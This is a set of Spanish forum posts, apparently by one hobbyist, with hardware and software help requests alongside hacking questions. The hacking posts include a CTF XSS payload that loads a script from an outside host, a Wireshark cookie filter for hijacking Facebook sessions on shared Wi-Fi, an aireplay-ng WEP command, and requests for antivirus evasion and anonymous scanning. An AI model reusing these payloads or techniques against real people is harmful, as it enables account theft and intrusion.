Temas

Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>


He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?


Gracias
Saludos!!

Hola buenas tardes, estoy probando una plataforma y tengo una duda acerca de XSS, he mandado el Alert y entrega una respuesta 200. pero no me muestra ninguna alerta, la pagina queda en blanco.





Se puede decir que esta url es vulnerable a XSS o realmente no?




Debo admitir que al realizar la alerta tuve un error de dedo y puse mal la función .json y me mostro un error de CakePHP, supongo que esto esta de mas, pero me gustaría saber si puedo explotarlo de alguna manera.





¿Alguna recomendacion?



Gracias

Bueno en mi casa tengo internet por medio de un Módem DSL de Telmex, tengo una contraseña fuerte y no tengo WPS activo, pero es un modelo viejo y al parecer tiene varias vulnerabilidades.

¿Que peligros puede tener esto?

Es posible que desde otro país se pueda acceder a mi Módem y hacerme MITM?

En caso de que alguien accediera al Módem de manera remota que ataque pudieran usar en mis equipos?

Gracias saludos

Buenas tardes estuve indagando en el apartado de wargames del foro pero no encontre ningun reto forense en español, alguien tendra alguno por ahi para practicar un poco?


Gracias saludos!

Buenas tardes, actualmente estoy intentado crear un proyecto en netbeans en java web.

Mi proyecto consiste en dar usuarios y contraseñas ya definidas y que cada usuario tenga la opcion de seleccionar una cancion de una lista y reproducirla y guardar la eleccion de cada usuario. Como podria hacer este proyecto tengo entendido que se tendria que usar manejo de sesiones. Pero alguien me podria dar una ayuda


Gracias

Hola buenas tardes, me gustaria preguntar e informarme acerca de los juegos online en javascript son juegos seguros? son faciles de modificar?  Que hace que un juego en javascript sea seguro?

Bueno me gustaría conocer la secuencia de una serie alfanumerica.
Me gustaria  saber si estoy haciendolo correctamente, lo primero que estoy intentando es recopilar información por ejemplo se que los Codigos Alfanumericos son de 10 caracteres,creo que el siguiente paso es conocer el charset pero no se cuantas muestras necesito. Tambien se que son 50,474,440 combinaciones dentro de la secuencia final.

Un Ejemplo de las Muestras


79JHZHZF2N
6LQP3XT3YD
WRVDNWNRKD
KV36TVN57W



¿Que me recomiendan seguir haciendo o que pasos pueden ayudar?


Gracias Saludos

Bueno vi un juego muy interesante en facebook, no soy mucho de juegos de navegador de hecho es el primero que juego despues de muuucho tiempo unos 7 años y me ha sorprendido el rendimiento, pero al parecer como ya se usa html5 en vez del flashplayer creo que ayuda mucho. Mi pregunta es como puedo saber en que esta hecho dicho juego?

Gracias

Hola buenas tardes, he estado probando con acunetix en un servidor local, para ver sus vulnerabilidades y al hacerlo acunetix me da aprox 160 Errores potenciales con Cross Site Scripting (Verified) en /.

Despues de probar con el ya clasico <script>alert("XSS")</script> no me da el mensaje que espero, en su lugar me da un error asi

/?module=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E


Es acaso que no es vulnerable ante XSS y es un falso positivo o algo estoy haciendo mal?

Gracias

Buenas tardes, de que manera puedo crear una maquina virtual para infectar continuamente con malware para analizar, sin que se vea afectada mi maquina principal.

Ya que una vez me sucedio que al hacer pruebas en la maquina virtual se infecto mi equipo fisico, posiblemente por una mala configuracion.

Gracias

Buenas tardes, estoy empezando un pequeño canal de youtube y me ha dado por dar premios, y me gustaria saber que tan seguro es usar contest.fbapp.io.
Es el contest de facebook, la dinamica es el que mas likes gana, pero claro por medio de ese contest. Es posible que puedan hacer trampa? Si es asi de que manera y como lo puedo evitar?

Gracias

Hola buenas tardes, quisiera saber si es posible recuperar el texto de un notepad que no se guardo, o en su defecto si es posible ver un historial del portapapeles en windows 8?

Bueno hace unos dias mi mouse empezó a fallar gravemente con problemas de doble click, he cambiado el tensor de cobre por uno nuevo pero apesar de que hace el ya famoso sonido CLICK, este hace la funcion pero solamente haciendo el movimiento para arriba con el dedo en el pulsador, ya con la tapa del mouse es muy dificil hacerlo funcionar



Alguien me podria decir si esta mal colocado o si ya es el micro swich?

Gracias

EDITO: He cambiado el microswich completo y esta como nuevo, gracias pueden cerrar

Al realizar escaneos con acunetix o SSS, cual es la mejor forma de permanecer anonimo? tambien al realizar SQL con diferentes programas, todo esto para Win Xp en maquina virtual

Bueno pues tengo una duda, tengo un pc particionado con windows xp y windows 7, si llegara a correr algun virus,troyano etc en cualquier S.O se veria afectado el otro sistema operativo? un ejemplo seria con el virus ramnit.

Gracias

Bien no resulta que el ordenador del trabajo de mi viejo se ha infectado con  ramnit.a y esta todo infectado, a pesar de tener eset smart security, el problema es que no la quiere formatear por los archivos del trabajo. Es posible desinfectar el pc sin formatear?

Nota
Ya probe restaurar sistema pero no esta habilitado.
Probe escanear con el eset y sale que todo esta infectado

Bueno pues eso es, posible explotarlo?

Warning: include_once(config.php) [function.include-once]: failed to open stream: No such file or directory in /home/-/public_html/0jh.net/alpha/99CPanel90/backup/cha3n.php on line 4

Hola bueno despues de ver que mi ram estaba dañada, ya arranca y pero al querer instalarse un windows xp que tengo meto el CD, y despues de cargar todo me dice que no se encontro Disco duro, asi que pase al BIOS y no me detecta ningun SATA.

Otra cosa muy aparte que pasa si a una tarjeta madre ddr3 se le pone una tarjeta de video ddr2?

Hola bueno eso despues de armar el pc desde cero, pero no me da video ya intente quitando la tarjeta de video, cambiando de posicion la ram, pero sigue igual. Como se soluciona o cual puede ser el problema?


La Pc esta conformada por

Tarjeta madre: asus m5a78l-m plus
Procesador: AMD FX 6 6100
Tarjeta de Video: Geforce 8500 GT
RAM: 4 GB
HDD: 250 GB
Lector DVD Externo via USB


Gracias

Hola tengo un Samsung Galaxy ace y bueno el muy cabernicola de su servidor actualiso el gingerbread y no prende el celular, hay manera de arreglarlo o ya va a parar ala basura?

Bueno pues eso ayer actualise del backtrack r1 al r2, pero desde entonces no me puedo conectar via wifi pues me aparece.

Conection Failed: Unable to get ip adress


como lo puedo solucionar?



gracias

Bueno pues me interesa adquirir un host con dominio .com, para una web sencilla ya busque pero la verdad es que no me convencen mucho algunos hosts, entonces acudo a ustedes y les pregunto que hosts me recomiendan?

Hola bueno pues la verdad es que recien empiezo a diseñar un pequeño blog, el problema esta en que no puedo eliminar un submenu de mi plantilla espero me puedan ayudar el codigo es masomenos asi. El Submenu que deseo eliminar es Photo y a su ves agregar otro menu espero me puedan ayudar. Gracias!


</div>

<div id='navigation'>
   <ul class='menu' id='dropmenu'><li id='home'><a href='/'>Home</a></li><li class='menu-item menu-item-type-taxonomy menu-item-object-category menu-item-254' id='menu-item-254'><a href='#'>Descargas</a>
<ul class='sub-menu'>
   <li class='menu-item menu-item-type-taxonomy menu-item-object-category menu-item-255' id='menu-item-255'><a href='/search/label/Juegos'>Juegos</a></li>

   <li class='menu-item menu-item-type-taxonomy menu-item-object-category menu-item-256' id='menu-item-256'><a href='#'>Apps</a>
   <ul class='menu'>
      <li class='menu-item menu-item-type-taxonomy menu-item-object-category menu-item-0' id='menu-item-258'><a href='#'>Photo</a>
      <ul class='sub-menu'>
         
      </ul>

</li>
   </ul>
</li>
</ul>
</li>

Bueno de aprobarse al 100% la ley sopa, nos afectaria de alguna manera directa ala comunidad?

Ademas de que todo el contenido en megaupload,rapid etcc se perderia?

Bueno pues mi pregunta es si la tablet playbook de blackberry se le puede cambiar el S.O a android?

Bueno pues mañana boy a USA a Arizona a ver a mis familiares y pasar la navidad, pero bueno, ando en una encrusijada   

Me gustaria comprarme una Tablet, mi presupuesto 200 Dlls (MALDITA CRISIS XD)
Estoy entre 2 Modelos Kindle Fire dicen que es muy buena y hasta que es la competencia al Ipad 2.

Del BlackBerry Playbook se muy poco, pero la verdad la marca impone mas pues ya he tenido aparatos blackberry y son muy buenos, pero no se cual sea lo mejor cabe decir que valia $500 Dlls tiene descuento en bestbuy y esta en $200 Dlls XD


Bueno pues pido su ayuda cual sera mejor son muy parecidas

Hola como estan, escribo para pedirles una peque;a ayuda respecto a robar una sesion de facebook dentro de una red Wifi, Ya intente con wireshack y http.cookie contains "datr" pero al parecer ya no da resultado, alguna forma de obtener la sesion?


Gracias

Bueno ultimamente he tenido un poco de tiempo libre asi que decidi formatear mi portatil y ponerle el backtrack R1, y bueno me preguntaba que tipo de ataques se podrian lanzar a un pc despues de obtener la clave wep?

Ya probe armitage,ettercap con wirehak.

Bueno con armitage ago el scan obtengo los host, pero muchas pcs me dicen  que estan cerradas y ni puedo ver la pc como host, y las que llego a aver intento todos los  atakes y ninguno es exitoso.

Con ettercap y wireshak intento hacer un Sniffing, MITM, pero resulta que el Ettercap no consigue obtener niguna Password, mientras que junto al wireshack Obtengo muchos packetes dentro del wireshack, pero no se ni he encontrado como se visualisan.

Gracias espero me puedan ayudar

Bueno tengo un netbook, la quiero formater, le quiero meter un windows que baje el problema es que pesa bastante y no tengo una usb de tanto espacio y por ser netbook no puede utilizar CDs/DVDs, mi pregunta es ¿Se puede formatear sin usar CDs/DVDs o USB? ¿Si es posible como?

Gracias

Hola bueno quiero aprender a usar el ya famoso Wireshark, he buscado tutoriales pero los que eh encontrado son muy viejos o tienen las imagenes caidas. Alguien me podria ayudar?, otra cosa Wireshark hace lo mismo que cain & abel??

Bueno me ha surgido esa gran duda, que se podria hacer con una wifi abierta?

Se podrian infiltrar algun tipo de spyware?
o alguna forma de sniffear o algo asi o que tipo de cosas se puede hacer con una wifi abierta?

Bueno no se si alguien ha tenido este problema pero aver ahi les va instale el Vmware cree una VM con windows XP pero al momento de por ejemplo abrir una carpeta le doy doble click y no abre pero si por ejemplo doy al boton inicio funciona perfecto.

Bueno siempre me surguio esta duda hay archivos .jar que son detectados por los antivirus, hay manera de indetectar este tipo de archivos?

Bueno en mi troyano a kaido un maldito desgraciado pedofilo, el problema es que es de alemania donde podria reportarlo contra las autoridades o que me recomiendan hacer?

bueno como dice el titulo, como se le puede hacer para enviar correos a hotmail y que llegen a bandeja de entrada. Pero sin tener al contacto agregado.

Gracias

estuve usando un metodo para indetectar un archivo, donde se juega con offtens, el problema es que ahorita tengo mas de 50,000 archivos en cuarentena y me alenta demasiado el pc y el mismo Av tarda mucho en analisar. ¿Donde se encuentra esa carpeta? - o Como puedo eliminar todos los archivos?

Bueno mi pregunta es esa se puede infectar de algun virus o dejar algun troyano por medio de un wifi, publica o protegida o no?

Hola bueno probe este programa con un par de redes lo unico que me lograba capturar era facebook del que estaba en la red etc, segun tengo entendido la aplicacion dejo de funcionar hay alguna forma de hacerlo manual o alguna forma para hacerlo funcionar?

GRacias

Hola bueno probe este programa con un par de redes lo unico que me lograba capturar era facebook del que estaba en la red etc, segun tengo entendido la aplicacion dejo de funcionar hay alguna forma de hacerlo manual o alguna forma para hacerlo funcionar?

GRacias

Bueno estoy empesando a aprender sobre este tema pero bueno haciendole un scann a una pagina me Salio que tenia 39 vulnerabilidades, el Programa se llama Joomla.

El problema esta que despues de encontrar esas vulnerabilidades no las puedo guardar le doy click derecho sabe y me tira el error que sale en la imagen que puedo hacer?

http://img8.imageshack.us/img8/7355/joomlat.png

Bueno pues tengo ese problema mi netbook se calienta muchisimo, hoy me puse a ver una serie de 24 minutos al acabar de ver el capitulo note que la netbook estaba muy caliente, asi que abri everest y vi una temperatura de 86C aqi la imagen.




PD: La netbook la pongo sobre una tabla con varios hoyos para que pase el aire y se ventile.

Es una netbook emachines Em250

Es normal esas temperaturas? Como arreglarlo?

Hola bueno tengo un problema despues de poner

aireplay-ng -1 0 -e EJEMPLO -a BBSID -h 00:11:33:22:44:55 wlan0


Sending Authentication Request
Authentication Succesful
Sending Association Request
Denied (Code 12), wrong ESSID or WPA?


La red es WPE, tecleo bien los datos pero sale eso.

Bueno me explico hice una particion a una netbook que originalmente tiene windows 7 starter, le puse windows 7 ultimate pero viene en ingles, asi que fui a las actualisaciones de windows hasta ahi todo bien descargo el pack de idioma espa;ol y oh sorpresa me da el siguiente error

Bueno les comento tengo un portatil me prestaron un CD con backtrack 4 algo hice mal y borre mi S.O (Windows 7), entonces intente formatear ahora con un CD de windows XP pero ya cuando esta cargando me aparece un pantallazo azul de windows que dice

Se ha encontrado un problema y windows ha sido apagado para evitar daños al equipo

***STOP: 0x0000007B (0xF78D2524,0xC0000034,0x00000000,0x00000000)

Alguien me podria ayudar y decirme como solucionarlo gracias!

Hola buenas tardes les comento tengo una notebook asi que instale vmware y instale back track 4 el problema es que al poner iwconfig no me detecta nada alguien me podria ayudar?

Datos de la Notebook:Notebook Emachines eM250,Windows7, Atheros AR5B95

Gracias de antemano